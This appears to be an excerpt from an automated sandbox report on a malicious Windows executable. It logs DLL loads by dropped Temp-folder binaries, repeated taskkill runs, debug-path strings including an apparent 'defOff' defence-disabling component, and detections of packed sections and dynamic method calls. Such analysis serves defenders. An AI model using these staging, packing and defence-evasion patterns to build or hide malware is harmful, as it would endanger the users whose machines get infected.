Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Section loaded: winrnr.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 1930752 > 1048576

Source: file.exe

Static PE information: Raw size of egarwnqv is bigger than: 0x100000 < 0x1a5a00

Source:	Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Unpacked PE file: 13.2.a6f0d09f38.exe.600000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Unpacked PE file: 14.2.b5da647ae3.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Unpacked PE file: 32.2.8b82d73f70.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;xbmfzvhb:EW;ztggrlpz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Unpacked PE file: 34.2.98a7b9f337.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
